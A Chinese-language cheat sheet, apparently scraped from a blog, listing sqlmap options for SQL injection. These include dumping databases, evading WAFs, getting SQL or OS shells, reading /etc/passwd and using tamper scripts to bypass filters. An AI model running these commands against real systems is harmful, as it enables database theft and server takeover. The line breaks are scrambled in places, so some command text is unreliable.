常用引數
--is-dba
判斷當前使用者是否有管理員許可權
--users
檢視所有使用者
--current-user
檢視當前使用者
--dbs
檢視所有資料庫
--current-db
檢視當前資料庫
-dtest
--tables
檢視test資料庫中的所有表
-dtest
-tusers
--columns
檢視test資料庫中user表的所有列
-dtest
-tusers
-cusername
--dump
檢視test資料庫中user表中username列中的所有資料
--dump-all
儲存所有資料到本地
--threads
10設定執行緒數
-ptestparameter
post注入指定某個引數,比如可以指定username
-h檢視幫助
get方法注入
post方法注入
帶引數注入
混淆注入
--identify-waf
識別waf型別
--dbms
=mysql
指定資料庫型別
--skip-waf
繞過waf
--random-agent
使用隨機http頭部
--mobile
模擬手機請求
--smart
進行積極的啟發式測試,快速判斷為注入的報錯點進行注入
--offline
減少跟對方的互動
example:sqlmap
-u"url"
--dbms
=mysql
--skip-waf
--random-agent
--mobile
高階注入
提權操作
--sql-shell
獲取資料庫許可權
--os-shell
獲取系統許可權
--os-pwn
與metaspolit互動
--file-read
="/etc/passwd"
讀取敏感資訊
使用tamper
apostrophemask.py
用utf8代替引號
equaltolike.py
like代替等號
space2dash.py
繞過過濾『=』
替換空格字元(」),(』
–『)後跟乙個破折號注釋,乙個隨機字串和乙個新行(』
n』)greatest.py
繞過過濾
>
space2hash.py
空格替換為
#號隨機字串以及換行符
apostrophenulencode.py
繞過過濾雙引號,替換字元和雙引號。
halfversionedmorekeywords.py
space2mssqlblank.py
空格替換為其它空符號
base64encode.py
用base64編碼替換
modsecurityversioned.py
過濾空格,包含完整的查詢版本注釋
space2mysqlblank.py
空格替換其它空白符號(mysql)
between
.py用between
替換大於號(
>
)space2mysqldash.py
替換空格字元(
' ')(
' -'
)後跟乙個破折號注釋乙個新行(
' n'
)space2plus.py
用+替換空格
參考文章 sqlmap常用命令
1.找到注入點url 2.sqlmap u url v 1 dbs 列出資料庫 或者 sqlmap u url v 1 current db 顯示當前資料庫 3.sqlmap u url v 1 users 列出資料庫使用者 current user當前資料庫使用者 4.sqlmap u url v...
SqlMap常用命令
sqlmap是我們常用的一款sql注入漏洞檢測工具,為了方便大家平時的使用,在此分享一下我總結的一下命令。目錄結構 extra 額外功能 lib 連線庫,注入引數,提權操作 tamper 繞過指令碼 thirdparty 第三方外掛程式 txt 字典,例如瀏覽器 表,列,關鍵字 udf 自定義攻擊載...
sqlmap常用命令
sqlmap.py u current db 獲取當前資料庫名稱 sqlmap.py u tables d db name 列出指定資料庫的所有表名 列出指定資料庫 指定表的欄位名 列出指定資料庫 指定表 指定欄位的內容,c column name 可以省略,省略的話會列出當前表的所有字段內容 攜帶...